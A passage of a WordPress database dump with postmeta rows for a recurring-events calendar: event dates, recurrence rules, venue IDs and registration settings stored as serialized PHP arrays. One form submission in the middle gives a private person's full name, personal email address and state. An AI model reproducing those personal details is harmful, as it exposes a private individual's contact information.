light-and-sound-1-2'),(119459,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(112840,262746,'_EventStartDate','2021-05-11 19:00:00'),(112841,262746,'_EventStartDateUTC','2021-05-12 01:00:00'),(112842,262746,'_EventEndDate','2021-05-11 20:00:00'),(112843,262746,'_EventEndDateUTC','2021-05-12 02:00:00'),(112844,262746,'_EventDuration','3600'),(119456,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(151786,266078,'_edit_lock','1639091239:2'),(119478,262745,'_EventVenueID','262507'),(119473,262745,'_RTECdeadlineType','start'),(119474,262745,'_RTECwhoCanRegister','any'),(119475,262745,'_RTEClimitRegistrations','0'),(119476,262745,'_RTECmaxRegistrations','30'),(119458,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119455,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119460,262745,'boldgrid_hide_page_title','1'),(119461,262745,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119448,262745,'_EventOrigin','events-calendar'),(119449,262745,'_EventOrigin','events-calendar'),(119450,262745,'_EventOrigin','events-calendar'),(119451,262745,'_EventOrigin','events-calendar'),(119452,262745,'_EventOrigin','events-calendar'),(119453,262745,'_EventOrigin','events-calendar'),(119454,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119447,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(122485,263255,'_RTECregistrationsDisabled','1'),(122487,263255,'_RTECwhoCanRegister','any'),(128907,263459,'_RTECdeadlineType','start'),(122482,263255,'_EventTimezone','America/Denver'),(128908,263459,'_RTECwhoCanRegister','any'),(124548,263319,'_EventShowMapLink','1'),(103764,254946,'_RTECregistrationsDisabled','1'),(103765,254946,'_RTECdeadlineType','start'),(103766,254946,'_RTECwhoCanRegister','any'),(103767,254946,'_RTEClimitRegistrations','0'),(103768,254946,'_RTECmaxRegistrations','30'),(103787,259055,'_RTECregistrationsDisabled','1'),(103788,259055,'_RTECdeadlineType','start'),(103789,259055,'_RTECwhoCanRegister','any'),(103790,259055,'_RTEClimitRegistrations','0'),(103791,259055,'_RTECmaxRegistrations','30'),(103792,259055,'_EventHideFromUpcoming','yes'),(31006,225018,'_EventCost',''),(31007,225018,'_EventURL',''),(31008,225018,'_EventTimezone','America/Denver'),(31009,225018,'_EventTimezoneAbbr','MST'),(31011,225018,'_dp_original','201534'),(31012,225018,'_edit_lock','1620593927:2'),(31013,225018,'_edit_last','2'),(31649,225135,'_EventOrigin','events-calendar'),(31650,225135,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";i:1576679616;s:13:\"_thumbnail_id\";i:1576679616;s:24:\"boldgrid_hide_page_title\";i:1576679616;s:16:\"_EventRecurrence\";i:1606922758;s:17:\"_EventShowMapLink\";i:1576679616;s:13:\"_EventShowMap\";i:1576679616;s:13:\"_EventVenueID\";i:1576679616;s:15:\"_EventStartDate\";i:1576679770;s:13:\"_EventEndDate\";i:1576679770;s:18:\"_EventStartDateUTC\";i:1576679770;s:16:\"_EventEndDateUTC\";i:1576679770;s:14:\"_EventDuration\";i:1576679616;s:20:\"_EventCurrencySymbol\";i:1576679616;s:22:\"_EventCurrencyPosition\";i:1576679616;s:10:\"_EventCost\";i:1576679616;s:9:\"_EventURL\";i:1576679616;s:14:\"_EventTimezone\";i:1576679616;s:18:\"_EventTimezoneAbbr\";i:1576679616;s:12:\"_dp_original\";i:1576679616;s:16:\"tribe_events_cat\";i:1576704816;s:10:\"_edit_last\";i:1576679688;s:10:\"post_title\";i:1576679799;s:12:\"post_content\";i:1576679770;s:11:\"post_status\";i:1576679770;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922768;s:16:\"protect_children\";i:1606922758;s:26:\"_RTECregistrationsDisabled\";i:1606922758;s:17:\"_RTECdeadlineType\";i:1606922758;s:19:\"_RTECwhoCanRegister\";i:1606922758;s:23:\"_RTEClimitRegistrations\";i:1606922758;s:21:\"_RTECmaxRegistrations\";i:1606922758;s:22:\"_EventHideFromUpcoming\";i:1606922758;}'),(31651,225135,'_EventOrigin','events-calendar'),(31652,225135,'_EventOrigin','events-calendar'),(31653,225135,'_EventOrigin','events-calendar'),(96547,262182,'_seq_num','110'),(96567,45842,'passster_activate_protection',NULL),(96568,45842,'passster_protection_type','password'),(117144,262885,'_EventOrigin','events-calendar'),(117234,262888,'_EventOrigin','events-calendar'),(117245,262888,'_EventVenueID','262507'),(117246,262888,'_EventCurrencySymbol',''),(117247,262888,'_EventCurrencyPosition','prefix'),(96540,262182,'_field_224','Dermot'),(96541,262182,'_field_225','McNamara'),(96542,262182,'_field_226','deardermot@gmail.com'),(96543,262182,'_field_227','CT'),(96544,262182,'_field_228','US'),(96545,262182,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(96546,262182,'_form_id','21'),(96253,262167,'_field_133','pat'),(96254,262167,'_field_134','winter'),(124843,263330,'_EventEndDate','2021-07-12 20:30:00'),(124844,263330,'_EventEndDateUTC','2021-07-13 02:30:00'),(124845,263330,'_EventDuration','5400'),(125481,263330,'protect_children',''),(125482,263330,'protect_children',''),(125483,263330,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125480,263330,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125493,263330,'boldgrid_hide_page_title','0'),(125494,263330,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125485,263330,'_EventOrigin','events-calendar'),(125495,263330,'_EventShowMapLink','1'),(125496,263330,'_EventShowMap','1'),(125497,263330,'_EventVenueID','262507'),(125498,263330,'_EventCurrencySymbol',''),(125622,263349,'_EventStartDate','2021-02-20 16:00:00'),(125500,263330,'_EventCost',''),(125499,263330,'_EventCurrencyPosition','prefix'),(125501,263330,'_EventURL',''),(125502,263330,'_EventTimezone','America/Denver'),(125503,263330,'_dp_original','263319'),(125504,263330,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125623,263349,'_EventEndDate','2021-02-20 17:00:00'),(125624,263349,'_EventStartDateUTC','2021-02-20 23:00:00'),(125506,263331,'protect_children',''),(125507,263331,'protect_children',''),(124874,263331,'_EventStartDate','2021-08-09 19:00:00'),(124875,263331,'_EventStartDateUTC','2021-08-10 01:00:00'),(124876,263331,'_EventEndDate','2021-08-09 20:30:00'),(124877,263331,'_EventEndDateUTC','2021-08-10 02:30:00'),(124878,263331,'_EventDuration','5400'),(125508,263331,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125505,263331,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125509,263331,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125619,263349,'_EventShowMapLink','1'),(125620,263349,'_EventShowMap','1'),(129531,263349,'_EventVenueID','263589'),(125514,263331,'_RTECdeadlineType','start'),(125515,263331,'_RTECwhoCanRegister','any'),(125516,263331,'_RTEClimitRegistrations','0'),(125517,263331,'_RTECmaxRegistrations','30'),(125518,263331,'boldgrid_hide_page_title','0'),(125519,263331,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125520,263331,'_EventShowMapLink','1'),(125521,263331,'_EventShowMap','1'),(125522,263331,'_EventVenueID','262507'),(125523,263331,'_EventCurrencySymbol',''),(125524,263331,'_EventCurrencyPosition','prefix'),(125525,263331,'_EventCost',''),(125526,263331,'_EventURL',''),(125527,263331,'_EventTimezone','America/Denver'),(125528,263331,'_dp_original','263319'),(125529,263331,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125511,263331,'_EventOrigin','events-calendar'),(125513,263331,'_RTECregistrationsDisabled','1'),(125510,263331,'_EventOrigin','events-calendar'),(125547,263332,'_EventVenueID','262507'),(125548,263332,'_EventCurrencySymbol',''),(124907,263332,'_EventStartDate','2021-09-13 19:00:00'),(124908,263332,'_EventStartDateUTC','2021-09-14 01:00:00'),(124909,263332,'_EventEndDate','2021-09-13 20:30:00'),(124910,263332,'_EventEndDateUTC','2021-09-14 02:30:00'),(124911,263332,'_EventDuration','5400'),(125610,263349,'_EventOrigin','events-calendar'),(125618,263349,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"6\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-16\";s:14:\"EventStartDate\";s:19:\"2021-02-20 16:00:00\";s:12:\"EventEndDate\";s:19:\"2021-02-20 17:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(129246,263589,'protect_children',''),(129247,263589,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1611952497;s:12:\"_VenueOrigin\";i:1611952497;s:10:\"_edit_last\";i:1611952509;s:10:\"post_title\";i:1611952509;s:11:\"post_status\";i:1611952509;s:17:\"_EventShowMapLink\";i:1611952509;s:13:\"_EventShowMap\";i:1611952509;s:17:\"_VenueShowMapLink\";i:1611952509;s:13:\"_VenueShowMap\";i:1611952509;s:13:\"_VenueAddress\";i:1611952509;s:10:\"_VenueCity\";i:1611952509;s:13:\"_VenueCountry\";i:1611952509;s:14:\"_VenueProvince\";i:1611952509;s:11:\"_VenueState\";i:1611952509;s:9:\"_VenueZip\";i:1611952509;s:11:\"_VenuePhone\";i:1611952509;s:9:\"_VenueURL\";i:1611952509;s:19:\"_VenueStateProvince\";i:1611952509;s:21:\"_VenueOverwriteCoords\";i:1611952509;s:24:\"boldgrid_hide_page_title\";i:1611952509;}'),(129248,263589,'_VenueOrigin','events-calendar'),(129249,263589,'_edit_last','2'),(125530,263332,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630422;s:12:\"_dp_original\";i:1610630422;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630422;s:16:\"tribe_events_cat\";i:1610655622;}'),(125536,263332,'_EventOrigin','events-calendar'),(125534,263332,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630422;s:12:\"_dp_original\";i:1610630422;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630422;s:16:\"tribe_events_cat\";i:1610655622;}'),(125545,263332,'_EventShowMapLink','1'),(125546,263332,'_EventShowMap','1'),(125541,263332,'_RTEClimitRegistrations','0'),(125542,263332,'_RTECmaxRegistrations','30'),(125543,263332,'boldgrid_hide_page_title','0'),(125544,263332,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(125538,263332,'_RTECregistrationsDisabled','1'),(125539,263332,'_RTECdeadlineType','start'),(125540,263332,'_RTECwhoCanRegister','any'),(125531,263332,'protect_children',''),(125532,263332,'protect_children',''),(125533,263332,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s: